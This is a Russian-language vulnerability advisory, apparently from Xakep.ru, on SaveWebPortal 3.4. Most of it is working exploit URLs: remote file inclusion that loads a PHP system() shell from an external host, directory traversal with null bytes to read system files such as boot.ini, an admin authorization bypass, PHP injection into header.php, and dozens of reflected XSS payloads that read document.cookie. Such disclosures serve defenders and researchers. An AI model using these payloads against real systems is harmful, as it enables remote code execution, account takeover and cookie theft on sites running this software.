Множественные уязвимости в SaveWebPortal

Рекомендуем почитать:

Xakep #299. Sysmon

Программа: SaveWebPortal 3.4

Удаленный пользователь может выполнить произвольный код на целевой системе, получить неавторизованный административный доступ и выполнить XSS нападение:

1. Выполнение произвольного кода:

http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site ]/cmd.gif%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00

Где cmd.gif:

<?php system('[some command]'); ?>

2. Удаленный пользователь может включить и выполнить произвольные PHP файлы на целевой системе:

http://[target]/saveweb/menu_dx.php?SITE_Path= ../../../../../[script].php%00
http://[ target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00

3. Удаленный пользователь также может просматривать не PHP файлы на целевой системе:

http://[target]/saveweb/menu_dx.php?SITE_Path= ../../../../../boot.ini%00
http://[target]/saveweb/menu_sx.php?CONTENTS _Dir=../../../../../boot.ini%00

4. Удаленный пользователь может обойти авторизацию и получить административный доступ:

http://[target]/saveweb/admin/PhpMyExplorer/ editerfichier.php?chemin=.&fich
ier= header.php&type=Source

5. С административным доступом, удаленный пользователь может внедрить произвольный PHP код в 'header.php' файл (или подобный файл) и затем заставить Web сервер выполнить этот код.

В нескольких сценариях обнаружена XSS уязвимость:

http://[target]/saveweb/footer.p hp?TABLE_Width=> <script>alert(document.cookie)</script>
http://[target]/saveweb/footer.php?SITE_Author_ Domain=><script>alert(document.cookie)</script>
http://[target]/s aveweb/footer.php?SITE_Author=> <script>alert(document.cookie)</script>
http://[target]/saveweb/footer.php?L_Info=><script> alert(document.cookie)</script>
http://[target]/saveweb/footer.php?L_Help=><script> alert(document.cookie)</script>
http://[target]/saveweb/header.php?TABLE_Width =><script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?L_Visitors=> <script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?count=><script> alert(document.cookie)</script>
http://[target]/saveweb/header.php?SITE_Logo="> <script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?BANNER_Url ="><script>alert(document.cookie)</script>

http://[target]/saveweb/header.php?L_Sunday="} </script><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Monday="} </script><script>alert(document.cookie)</script><!--
[etc.]

http://[target]/saveweb/header.php?L_January="} </script><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_February="} </script><script>alert(document.cookie)</script><!--
[etc.]

http://[target]/saveweb/header.php?IMAGES_Url="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Info="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Help="> <script>alert(document.cookie)</script><!--

http://[target]/saveweb/menu_dx.php?L_InsertCorrectly= <script>alert(document.cookie)</script>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Login =<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_Username =<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_ Password=<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_Ok=<script> alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?IMAGES_Url="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_ Registration="><script>alert(document.cookie)
</script><!--
http://[target]/saveweb/menu_dx.php?BANNER_Url="><script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUSX_ Newsletter=<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_InsertEMail =<script>alert(document.cookie)</script><!--

http://[target]/saveweb/menu_sx.php?L_InsertNOK3Char=");} </script><script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Channels =<script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Home =<script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Archive =<script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_Search= <script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_Ok= <script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?IMAGES_Url= "><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Services="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Links= "><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Newsletter="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Polls="><script>alert(document.cookie)</script>

http://[target]/saveweb/menu_sx.php?L_MENUSX_ ECards="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Downloads="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Community="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Forum="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Chat="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Nicknames="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Membership="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Login="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ UserProfile="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ PasswordForgot="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Logout="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Contacts="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Guestbook="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ ContactUs="><script>alert(document.cookie)</script>

Множественные уязвимости в SaveWebPortal

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Нетипичная змея. Реверсим приложение на Python c кастомным интерпретатором

Картинки в водопаде. Учимся рисовать изображения радиоволнами

Agent Tesla. Учимся реверсить боевую малварь в Ghidra

HTB Surveillance. Эксплуатируем инъекцию команд через скрипт ZoneMinder

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Microsoft удалила WizardLM 2 LLM, не прошедшую тест на токсичность, но пользователи ее сохранили

Google снова откладывает отключение сторонних cookie

Исследователь заявляет, что взломал DRM-технологию Microsoft

Умный телевизор Hisense случайно вывел из строя Windows-компьютер владельца

Количество атак на мобильные устройства в России возросло в 5,2 раза